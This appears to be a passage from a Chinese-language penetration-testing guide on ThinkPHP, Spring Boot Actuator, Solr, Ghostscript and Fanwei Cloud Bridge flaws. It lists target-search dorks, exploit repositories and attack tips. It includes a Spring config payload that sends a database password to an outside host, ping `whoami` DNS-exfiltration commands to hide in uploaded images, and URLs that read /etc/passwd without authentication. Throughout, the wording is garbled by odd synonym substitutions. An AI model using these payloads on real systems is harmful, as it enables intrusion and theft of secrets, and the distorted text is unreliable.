    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1.漏洞简介</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;Thinkphp 是国内很<span style="color: black;">平常</span>的PHP框架, 存在 远程代码执行/sql注入/反序列</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;化/日志文件<span style="color: black;">泄密</span>等问题</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2.影响组件</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;Thinkphp</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">3.漏洞指纹</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;Thinkphp X-Powered-By: ThinkPHP</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">4.Fofa Dork&nbsp;</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;app="ThinkPHP"</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">5.漏 洞 分 析</strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; ①ThinkPHP漏洞总结 – 赛克社区</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;http://zone.secevery.com/article/1165</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp;②&nbsp;挖 掘 暗 藏 ThinkPHP 中 的 反 序 列 利 用 链 :</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;https://blog.riskivy.com/挖掘暗藏thinkphp中的反序列利用链/</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">③ThinkPHP 使 用 不 当 可 能 造 成 敏 感 信 息 泄 露 :</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;https://blog.csdn.net/Fly_hps/article/details/81201904</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp;④ DSMall 代 码 审 计 :</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;https://www.anquanke.com/post/id/203461</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">6.漏洞利用</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">①SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">②Dido1960/thinkphp: thinkphp反序列化漏洞复现及POC编</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;https://github.com/Dido1960/thinkphp</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; ③whirlwind110/tphack: Thinkphp3/5 Log文件泄漏利用工具</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;https://github.com/whirlwind110/tphack</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">7.利用技巧</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">①遇到Thinkphp的站点看一下版本, <span style="color: black;">或</span>直接扫一下, <span style="color: black;">瞧瞧</span>有<span style="color: black;">无</span>rce, <span style="color: black;">或</span>日志文件<span style="color: black;">泄密</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;②自从挖了thinphp的反序列化利用链以后, 这类型考题经常出没在ctf中</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">③实战中<span style="color: black;">亦</span>看到偶尔有<span style="color: black;">能够</span>利用的<span style="color: black;">状况</span>, 运气好可能有惊喜, 刚好有篇新出的<span style="color: black;">文案</span>中<span style="color: black;">运用</span>到了这个漏洞DSMall代码审计 – 安全客,安全<span style="color: black;">新闻</span>平台</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">https://www.anquanke.com/post/id/203461</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">8.防 护 方 法</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;①<span style="color: black;">即时</span>更新补丁</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;②升级到最新版Thinkphp</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;③前置WAF进行防护</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/vl1Efs3jVXk63TAB9ytfUXr2911Wjl5DVHlvCtY2N9d1312yVicxsMVOsdpBqvhuS4vVP64CsZTls0Hp1rDruEg/640?wx_fmt=jpeg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">十<span style="color: black;">5、</span>Spring 系列漏洞</span></strong></p><img src="https://mmbiz.qpic.cn/mmbiz_png/3rC9q1ZEJstC93ELZicJO4zmG3rByPQ8eeWwCVevhItZoLJuvWj1KUuIHnhbY2Z5ddPIdwy4rAjqfMiaCgB0vlDg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1.漏洞简介</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Spring 是java web里最最最最<span style="color: black;">平常</span>的组件了, 自然<span style="color: black;">亦</span>是<span style="color: black;">科研</span>的热门, 好用的漏洞<span style="color: black;">重点</span>是Spring Boot Actuators 反序列化, 火起来之前用了一两年, 效果很棒</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2.影响组件</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;Spring xxx</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">3.漏洞指纹</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;X-Application-Context:</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">4.Fofa Dork</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;app="Spring-Framework"</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">5.漏洞分析</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(1)Spring 框架漏洞集合:https://misakikata.github.io/2020/04/Spring-框架漏洞集合</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(2)Exploiting Spring Boot Actuators | Veracode blog https://www.veracode.com/blog/research/exploiting-spring-boot-actuators(3)Spring Boot Actuators 配 置 不 当 导 致 RCE 漏 洞 复 现 :https://jianfensec.com/漏洞复现/Spring Boot Actuators配置<span style="color: black;">欠妥</span><span style="color: black;">引起</span>RCE漏洞复现/</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">6.漏洞利用</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(1)mpgn/Spring-Boot-Actuator-Exploit:&nbsp;Spring&nbsp;Boot&nbsp;Actuator&nbsp;(jolokia)&nbsp;XXE/RCE</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">https://github.com/mpgn/Spring-Boot-Actuator-Exploit</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(2)artsploit/yaml-payload:&nbsp;A&nbsp;tiny&nbsp;project&nbsp;for&nbsp;generating&nbsp;SnakeYAML&nbsp;deserialization&nbsp;payloads</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">https://github.com/artsploit/yaml-payload</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">7.利用技巧</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(1)Spring Boot Actuators <span style="color: black;">关联</span>漏洞超级好用,<span style="color: black;">非常多</span>厂商一<span style="color: black;">起始</span>都不懂, 直接对外开放Spring Boot Actuators, 造<span style="color: black;">成为了</span>有一段时间<span style="color: black;">每一个</span>用了Spring Boot的厂商都出了问题,尤其是<span style="color: black;">此刻</span><span style="color: black;">非常多</span>厂商<span style="color: black;">运用</span>微服务框架, <span style="color: black;">经过</span>网关进行路由分发, <span style="color: black;">有些</span>子目录<span style="color: black;">一般</span>对应一个Spring Boot<span style="color: black;">起步</span>的服务。<span style="color: black;">而后</span>子目录<span style="color: black;">例如</span> http://123.123.123.123/admin/env,</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">http://123.123.123.123/manager/env<span style="color: black;">亦</span>都是<span style="color: black;">能够</span><span style="color: black;">显现</span>的/env <span style="color: black;">能够</span>偷session, RCE/heapdump <span style="color: black;">能够</span>直接dump jvm中的对象, <span style="color: black;">运用</span> jhat <span style="color: black;">能够</span>读取里面的对象<span style="color: black;">能够</span>遍历如下的endpoint, 1.x 2.x的目录不<span style="color: black;">同样</span>, <span style="color: black;">因此</span>都覆盖了一下</p><span style="color: black;">/trace</span><span style="color: black;">/health</span><span style="color: black;">/loggers</span><span style="color: black;">/metrics</span><span style="color: black;">/autoconfig</span><span style="color: black;">/heapdump</span><span style="color: black;">/threaddump</span><span style="color: black;">/env</span><span style="color: black;">/info</span><span style="color: black;">/<span style="color: black;">dump</span></span><span style="color: black;">/configprops</span><span style="color: black;">/mappings</span><span style="color: black;">/auditevents</span><span style="color: black;">/beans</span><span style="color: black;">/jolokia</span><span style="color: black;">/cloudfoundryapplication</span><span style="color: black;">/hystrix.stream</span><span style="color: black;">/actuator</span><span style="color: black;">/actuator/auditevents</span><span style="color: black;">/actuator/beans</span><span style="color: black;">/actuator/health</span><span style="color: black;">/actuator/conditions</span><span style="color: black;">/actuator/configprops</span><span style="color: black;">/actuator/env</span><span style="color: black;">/actuator/info</span><span style="color: black;">/actuator/loggers</span><span style="color: black;">/actuator/heapdump</span><span style="color: black;">/actuator/threaddump</span><span style="color: black;">/actuator/metrics</span><span style="color: black;">/actuator/scheduledtasks</span><span style="color: black;">/actuator/httptrace</span><span style="color: black;">/actuator/mappings</span><span style="color: black;">/actuator/jolokia</span><span style="color: black;">/actuator/hystrix.stream</span><span style="color: black;">/monitor</span><span style="color: black;">/monitor/auditevents</span><span style="color: black;">/monitor/beans</span><span style="color: black;">/monitor/health</span><span style="color: black;">/monitor/conditions</span><span style="color: black;">/monitor/configprops</span><span style="color: black;">/monitor/env</span><span style="color: black;">/monitor/info</span><span style="color: black;">/monitor/loggers</span><span style="color: black;">/monitor/heapdump</span><span style="color: black;">/monitor/threaddump</span><span style="color: black;">/monitor/metrics</span><span style="color: black;">/monitor/scheduledtasks</span><span style="color: black;">/monitor/httptrace</span><span style="color: black;">/monitor/mappings</span><span style="color: black;">/monitor/jolokia</span><span style="color: black;">/monitor/hystrix.strea</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">这儿</span><span style="color: black;">经过</span> /env + /refresh 进行rce应该还有其他利用手法, 当spring boot reload的时候会进行<span style="color: black;">有些</span>默认操作,里面就有操作空间, 很像fastjson反序列化。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(2)就算实在<span style="color: black;">不可</span>RCE, <span style="color: black;">这儿</span><span style="color: black;">亦</span>有个技巧<span style="color: black;">能够</span>偷取 Spring 配置文件中的加密字段, 偷一下生产环境的<span style="color: black;">秘码</span>/key<span style="color: black;">亦</span>ok</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">eureka.client.serviceUrl.defaultZone=http://${somedb.pasword}@127.0.0.1:5000spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(3)尤其是<span style="color: black;">运用</span>spring eureka做集群的时候, <span style="color: black;">一般</span>拿到一台服务器, 就<span style="color: black;">能够</span>传递恶意注册到其他server, 从而感染<span style="color: black;">全部</span>微服务集群eureka <span style="color: black;">一般</span>是 server <span style="color: black;">亦</span>是 client, 无论对方请求什么都直接返回恶意序列化xml就可以了</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">8.防护<span style="color: black;">办法</span></strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;①<span style="color: black;">即时</span>更新补丁</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;②开启Spring Boot Actuators权限校验</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;③前置WAF进行防护</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/vl1Efs3jVXk63TAB9ytfUXr2911Wjl5DVHlvCtY2N9d1312yVicxsMVOsdpBqvhuS4vVP64CsZTls0Hp1rDruEg/640?wx_fmt=jpeg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">十<span style="color: black;">6、</span>Solr 系列漏洞</span></strong></p><img src="https://mmbiz.qpic.cn/mmbiz_png/3rC9q1ZEJstC93ELZicJO4zmG3rByPQ8eeWwCVevhItZoLJuvWj1KUuIHnhbY2Z5ddPIdwy4rAjqfMiaCgB0vlDg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1.漏洞简介</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;Solr 是企业<span style="color: black;">平常</span>的全文搜索服务, 这两年<span style="color: black;">亦</span>爆出<span style="color: black;">非常多</span>安全漏洞,</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2.影响组件</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;Solr</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">3.漏洞指纹</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;Solr</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">4.Fofa Dork&nbsp;</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;app="Solr"</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">5.漏洞分析</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;Apache Solr最新RCE漏洞分析 – FreeBuf互联网安全新<span style="color: black;">媒介</span>平台https://www.freebuf.com/vuls/218730.html</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析https://paper.seebug.org/1009/</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">6.漏洞利用</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">veracode-research/solr-injection: Apache Solr Injection Research https://github.com/veracode-research/solr-injection</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">jas502n/CVE-2019-12409: Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS=”true”)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">https://github.com/jas502n/CVE-2019-12409</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">mogwailabs/mjet: MOGWAI LABS JMX exploitation toolkit https://github.com/mogwailabs/mjet</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">7.利用技巧</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">看到锤就完事了, 漏洞太多了, 一片一片的</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">遇到mjet连接超时,这是<span style="color: black;">目的</span>服务起返回了错误的stub(内网<span style="color: black;">位置</span>, <span style="color: black;">平常</span>于docker), <span style="color: black;">能够</span><span style="color: black;">运用</span>socat进行流量转发, 后记里面有<span style="color: black;">详细</span>操作</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">8.防 护 方 法</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">&nbsp;&nbsp;&nbsp;&nbsp;①</strong>升级到最新版</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;②不要对外开放<span style="color: black;">敏锐</span>端口</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/vl1Efs3jVXk63TAB9ytfUXr2911Wjl5DVHlvCtY2N9d1312yVicxsMVOsdpBqvhuS4vVP64CsZTls0Hp1rDruEg/640?wx_fmt=jpeg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">十<span style="color: black;">7、</span>Ghostscript 上传<span style="color: black;">照片</span>代码执行</span></strong></p><img src="https://mmbiz.qpic.cn/mmbiz_png/3rC9q1ZEJstC93ELZicJO4zmG3rByPQ8eeWwCVevhItZoLJuvWj1KUuIHnhbY2Z5ddPIdwy4rAjqfMiaCgB0vlDg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1.漏洞简介</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Ghostscript 是图像处理中<span style="color: black;">非常</span>常用的库, 集成在imagemagick等多个开源组件中, 其 .ps文件存在沙箱绕过<span style="color: black;">引起</span>代码执行的问题影响广泛, <span style="color: black;">因为</span>上传<span style="color: black;">照片</span>就有可能代码执行, <span style="color: black;">非常多</span>大厂中招</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2.影响组件</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">imagemagick, libmagick, graphicsmagick, gimp, python-matplotlib, texlive-core, texmacs, latex2html, latex2rtf 等图像处理应用</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">3.漏洞指纹</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">.ps/.jpg/.png</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">4.漏 洞 分 析 &nbsp; &nbsp; &nbsp;</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">ghostscript命令执行漏洞预警</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">https://www.anquanke.com/post/id/157513</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">5.漏洞利用</strong></p><span style="color: black;">Exploit Database Search</span><span style="color: black;"><span style="color: black;">https:</span>/<span style="color: black;">/www.exploit-db.com/search</span>?q=Ghostscript&nbsp;</span><span style="color: black;">vulhub/ghostscript/CVE-<span style="color: black;">2019</span>-<span style="color: black;">6116</span> at master · vulhub/vulhub</span><span style="color: black;"><span style="color: black;">https:</span>/<span style="color: black;">/github.com/vulhub</span><span style="color: black;">/vulhub/tree</span><span style="color: black;">/master/ghostscript</span><span style="color: black;">/CVE-2019-6116</span></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">6.利用技巧</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">倘若</span><span style="color: black;">发掘</span>网站<span style="color: black;">能够</span>上传<span style="color: black;">照片</span>, 且<span style="color: black;">照片</span><span style="color: black;">无</span>经过裁剪, 最后返回缩略图, <span style="color: black;">这儿</span>就可能存在Ghostscript 上传<span style="color: black;">照片</span>代码执行dnslog <span style="color: black;">能够</span>用 ping</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">`uname`.admin.ceye.io 或 ping `whoami`.admin.ceye.io<span style="color: black;">保留</span>成<span style="color: black;">照片</span>, 以后用起来方便, 有个版本的 centos 和 ubuntu poc还不<span style="color: black;">同样</span>, <span style="color: black;">能够</span><span style="color: black;">这般</span>构造ping `whoami`.centos.admin.ceye.io / ping `whoami`.ubuntu.admin.ceye.io分别命名为 centos_ps.jpg/ubuntu_ps.jpg, <span style="color: black;">这般</span>测试的时候直接传2个文件, <span style="color: black;">经过</span>DNSLOG<span style="color: black;">能够</span>区分是哪个poc执行的</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">7.&nbsp;防护<span style="color: black;">办法</span></strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;升级到最新版</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/vl1Efs3jVXk63TAB9ytfUXr2911Wjl5DVHlvCtY2N9d1312yVicxsMVOsdpBqvhuS4vVP64CsZTls0Hp1rDruEg/640?wx_fmt=jpeg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">十八、泛微云桥复现</span></strong></p><img src="https://mmbiz.qpic.cn/mmbiz_png/3rC9q1ZEJstC93ELZicJO4zmG3rByPQ8eeWwCVevhItZoLJuvWj1KUuIHnhbY2Z5ddPIdwy4rAjqfMiaCgB0vlDg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1.其 实 没 什 么 复 现 的,未 授 权 读 取,直 接 调 用 exp 就 OK</strong></p><span style="color: black;"><span style="color: black;">http:</span>/<span style="color: black;">/www.xxx.com/wxjsapi</span><span style="color: black;">/saveYZJFile?fileName=test&amp;downloadUrl=file:/</span><span style="color: black;">//etc</span><span style="color: black;">/passwd&amp;fileExt=txt </span></span><span style="color: black;"><span style="color: black;">http:/</span><span style="color: black;">/www.xxx.com/wxjsapi</span><span style="color: black;">/saveYZJFile?fileName=test&amp;downloadUrl=file:/</span><span style="color: black;">//c</span><span style="color: black;">://windows/win</span>.ini&amp;fileExt=txt</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2.任意读取linux的passwd值</strong></p><span style="color: black;">可在响应包中JSON中<span style="color: black;">包括</span>ID的<span style="color: black;">32</span>位值再次请求可<span style="color: black;">得到</span>/etc/passwd值</span><span style="color: black;"><span style="color: black;">http:</span>/<span style="color: black;">/www.xxx.com/</span>FileNoLogin/<span style="color: black;">32</span>位MD5值</span><span style="color: black;"><span style="color: black;">http:</span>/<span style="color: black;">/www.xxx.com/wxjsapi</span><span style="color: black;">/saveYZJFile?fileName=test&amp;downloadUrl=file:/</span><span style="color: black;">//etc</span><span style="color: black;">/passwd&amp;fileExt=txt</span></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
